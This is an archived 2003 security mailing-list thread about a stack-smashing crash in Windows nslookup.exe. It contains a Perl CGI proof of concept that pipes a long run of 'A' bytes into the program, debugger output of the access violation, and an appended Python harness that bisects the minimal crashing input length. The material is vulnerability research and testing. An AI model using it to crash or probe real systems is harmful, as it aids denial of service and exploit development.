Vulnerability Development mailing list archives
Re: NSLOOKUP.EXE
From: Ryan Yagatich <ryany () pantek com>
Date: Fri, 21 Mar 2003 12:04:49 -0500 (EST)
==begin silly.cgi
#!perl -w
use strict;

# Minimal CGI that pipes a fixed payload straight into nslookup.exe's stdin,
# the way a careless script would pipe user input; a 6489-byte run of "A"
# is enough to trigger the access violation shown in the debugger output
# below.
print "Content-type: text/html\n\n";
open(NSLOOKUP, "|nslookup.exe") || die "Could not open nslookup.exe (path?)";
print NSLOOKUP "A" x 6489;
close(NSLOOKUP);
==end silly.cgi
MSDE:
Unhandled exception at 0x01004d65 in NSLOOKUP.EXE: 0xC0000005: Access
violation writing location 0x0103e000.
01004D5D cmp esi,100F770h
01004D63 je 01004D6F
---> 01004D65 mov dword ptr [edi],esi
01004D67 add edi,4
01004D6A jmp 01004C37
01004D65 = 16797029
,_____________________________________________________,
\ Ryan Yagatich support () pantek com \
/ Pantek Incorporated (877) LINUX-FIX /
\ http://www.pantek.com/security (440) 519-1802 \
/ Are your networks secure? Are you certain? /
\___A4536371BF88C57DB181799D00BCA331E6AD909D297C3493___\
On Thu, 20 Mar 2003, Blue Boar wrote:

> Patrick Webster wrote:
> > Can you do anything interesting with this?:
> >
> > C:\>nslookup
> > Default Server:  dns.server.net
> > Address:  111.222.333.444
> >
> > AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
> > AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
> > AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
> >
> > Gives error: memory can't be "read" - 0x414141 (aka A).
>
> If you have to manually type all the A's, then probably not. Maybe if
> someone did something silly like make a CGI script that calls nslookup.exe
> directly with user input.
>
> What OS are you testing on? It looks like it's fixed in XP:
>
> C:\winxp\system32>nslookup
> Default Server:  dns1.snfcca.sbcglobal.net
> Address:  206.13.28.12
>
> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
> *** Input is too long
>
> BB
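The post picks 6489 bytes somewhat arbitrarily and reads the crash off a debugger. The following harness, added here as an example and not part of the original post or of anything Microsoft ships, automates that step: it pipes a payload into a target's stdin the way silly.cgi does, reports the 32-bit exit status (on Windows an unhandled exception surfaces as the NTSTATUS code, 0xC0000005 for the access violation shown above), and bisects the smallest crashing length. The name and location of nslookup.exe and its exit behaviour are assumptions; fake_target_argv is a constructed stand-in so the harness can be exercised on any OS.

```python
"""Crash-length triage harness (added example; assumes nslookup.exe on PATH
on an unpatched Windows box, and that an unhandled exception is reported as
the NTSTATUS exit code)."""
import subprocess
import sys

STATUS_ACCESS_VIOLATION = 0xC0000005  # NTSTATUS reported in the debugger output above


def feed_stdin(argv, payload, timeout=15):
    """Run argv, write payload to its stdin and return its 32-bit exit status.
    Returns None if the target hangs (nslookup may block on the resolver, or a
    WER/just-in-time debugger dialog may hold the crashed process open)."""
    try:
        proc = subprocess.run(argv, input=payload, capture_output=True, timeout=timeout)
    except subprocess.TimeoutExpired:
        return None
    # Windows exit codes arrive unsigned; mask so a negative value on other
    # platforms (death by signal) compares the same way.
    return proc.returncode & 0xFFFFFFFF


def crashes(argv, length, fill=b"A", bad_status=STATUS_ACCESS_VIOLATION):
    """True if feeding `length` fill bytes (plus a CRLF, so the target sees a
    complete command line) makes the target exit with bad_status."""
    return feed_stdin(argv, fill * length + b"\r\n") == bad_status


def bisect_threshold(is_bad, lo, hi):
    """Smallest n with is_bad(n) true, given is_bad(lo) false and is_bad(hi)
    true; assumes the predicate is monotonic in the input length."""
    while hi - lo > 1:
        mid = (lo + hi) // 2
        if is_bad(mid):
            hi = mid
        else:
            lo = mid
    return hi


def fake_target_argv(limit=4096):
    """Constructed stand-in for nslookup.exe: a Python one-liner that exits 1
    once it has read more than `limit` bytes from stdin, so the harness can be
    exercised where the real binary is not available."""
    code = f"import sys; sys.exit(1 if len(sys.stdin.buffer.read()) > {limit} else 0)"
    return [sys.executable, "-c", code]


if __name__ == "__main__":
    # Real run (Windows, nslookup.exe on PATH is an assumption): start from the
    # 6489-byte payload in silly.cgi and shrink it to the minimal crashing length.
    argv = sys.argv[1:] or ["nslookup.exe"]
    if not crashes(argv, 6489):
        print("no access violation at 6489 bytes: patched build, hang, or wrong target?")
    else:
        n = bisect_threshold(lambda k: crashes(argv, k), 0, 6489)
        print(f"smallest crashing payload: {n} bytes")
```

A result of None from feed_stdin usually means the crash was caught by a dialog rather than terminating the process; run with Windows Error Reporting dialogs disabled or under a non-interactive debugger so the exit status is reported. On the XP build quoted above, which rejects the line with "Input is too long", the harness should report no access violation at any length.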
Current thread:
- NSLOOKUP.EXE Patrick Webster (Mar 20)
- Re: NSLOOKUP.EXE Blue Boar (Mar 20)
- RE: NSLOOKUP.EXE Brett Moore (Mar 21)
- Re: NSLOOKUP.EXE Ryan Yagatich (Mar 21)
- Re: NSLOOKUP.EXE K. K. Mookhey (Mar 23)
- RE: NSLOOKUP.EXE Brett Moore (Mar 23)
- Re: NSLOOKUP.EXE Marcos D. Marado Torres (Mar 24)
- <Possible follow-ups>
- RE: NSLOOKUP.EXE Patrick Webster (Mar 20)
- RES: NSLOOKUP.EXE Cleber P. de Souza (Mar 21)
- Re: NSLOOKUP.EXE Nexus (Mar 21)
- RE: NSLOOKUP.EXE Sillari Andrea (Mar 21)
- Re: NSLOOKUP.EXE Filip Maertens (Mar 21)
- Re: NSLOOKUP.EXE Chris Calabrese (Mar 21)
- Re: NSLOOKUP.EXE Mysq (Mar 21)
- Re: NSLOOKUP.EXE Blue Boar (Mar 20)
